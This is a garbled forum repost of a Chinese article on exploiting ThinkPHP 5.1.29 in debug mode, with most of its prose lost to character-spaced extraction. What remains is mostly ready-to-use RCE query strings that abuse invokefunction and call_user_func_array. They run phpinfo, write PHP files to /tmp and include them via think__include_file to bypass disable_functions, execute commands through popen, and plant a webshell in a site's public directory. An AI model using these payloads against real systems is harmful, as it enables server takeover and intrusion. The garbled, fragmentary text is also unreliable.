搜索

[27344] 2020-07-17_实战技巧ThinkPHP文件包含姿势打下目标

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-19
2020-07-17_实战技巧ThinkPHP文件包含姿势打下目标 | T h i n k P H P 姿   M i M a n C h i   N e a r S e c   2 0 2 0 - 0 7 - 1 7     便 # 0 x 0 1   d e b u g   t p 5 . 1 . 2 9   I P 访 l n m p d i s a b l e _ f u n c t i o n t p 5 . 1 X p a y l o a d , p a y l o a d   使 f i l e _ g e t _ c o n t e n t s g e t s h e l l ? s = i n d e x / t h i n k C o n t a i n e r / i n v o k e f u n c t i o n & f u n c t i o n = c a l l _ u s e r _ f u n c _ a r r a y & v a r s [ 0 ] = p h p i n f o & v a r s [ 1 ] [ ] = 1 ? s = i n d e x / t h i n k C o n t a i n e r / i n v o k e f u n c t i o n & f u n c t i o n = c a l l _ u s e r _ f u n c _ a r r a y & v a r s [ 0 ] = f i l e _ p u t _ c o n t e n t s & v a r s [ 1 ] [ ] = t e s t 1 . t x t & v a r s [ 1 ] [ ] = % 3 C ? p h p % 2 0 p h p i n f o ( ) ; ? % 3 E
# 0 x 0 2   d e b u g w e b s h e l l / t m p   使 t h i n k _ _ i n c l u d e _ f i l e P H P i n f o t m p # 0 x 0 3   西 西 / t m p p h p i n f o P H P i n f o " d i s a b l e _ f u n c t i o n , p o p e n "   ? s = i n d e x / t h i n k C o n t a i n e r / i n v o k e f u n c t i o n & f u n c t i o n = c a l l _ u s e r _ f u n c _ a r r a y & v a r s [ 0 ] = f i l e _ p u t _ c o n t e n t s & v a r s [ 1 ] [ ] = / t m p / t e s t 1 . t x t & v a r s [ 1 ] [ ] = % 3 C ? p h p % 2 0 p h p i n f o ( ) ; ? % 3 E ? s = i n d e x / t h i n k a p p / i n v o k e f u n c t i o n & f u n c t i o n = c a l l _ u s e r _ f u n c _ a r r a y & v a r s [ 0 ] = t h i n k _ _ i n c l u d e _ f i l e & v a r s [ 1 ] [ ] = / t m p / t e s t 1 . t x t
w e b   " p o p e n "   2 4 9 " / t m p / t e s t 1 . t x t " 使 " w w w "   l s p r i n t 使 r e a d f i l e " / t m p / t e s t 1 . t x t " " i n c l u d e _ f i l e " " r e a d f i l e " " l s   - l a   / h o m e / w w w r o o t / x x x x x x / p u b l i c / " ? s = i n d e x / t h i n k C o n t a i n e r / i n v o k e f u n c t i o n & f u n c t i o n = c a l l _ u s e r _ f u n c _ a r r a y & v a r s [ 0 ] = f i l e _ p u t _ c o n t e n t s & v a r s [ 1 ] [ ] = / t m p / t e s t 1 . t x t & v a r s [ 1 ] [ ] = < ? p h p   $ f d   =   p o p e n ( " c o m m a n d " , ' r ' ) ;   $ r e t   =   f g e t s ( ? s = i n d e x / t h i n k a p p / i n v o k e f u n c t i o n & f u n c t i o n = c a l l _ u s e r _ f u n c _ a r r a y & v a r s [ 0 ] = t h i n k _ _ i n c l u d e _ f i l e & v a r s [ 1 ] [ ] = / t m p / t e s t 1 . t x t
# 0 x 0 4   g e t s h e l l " s t a t i c " " f i l e _ p u t _ c o n t e n t s "   s h e l l s t a t i c   g e t s h e l l   # 0 x 0 5   t h i n k P H P 5   R C E : h t t p s : / / w w w . m i m a n c h i . o n l i n e / i n d e x . p h p / a r c h i v e s / 1 2 / n e a r s e c ? s = i n d e x / t h i n k C o n t a i n e r / i n v o k e f u n c t i o n & f u n c t i o n = c a l l _ u s e r _ f u n c _ a r r a y & v a r s [ 0 ] = f i l e _ p u t _ c o n t e n t s & v a r s [ 1 ] [ ] = / h o m e / w w w r o o t / X X X X X X X X X / t e s t / p u b l i c / x . p h p & v a r s [ 1 ] [ ] = p h p s h e l l X X X X X X X X X X X X
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理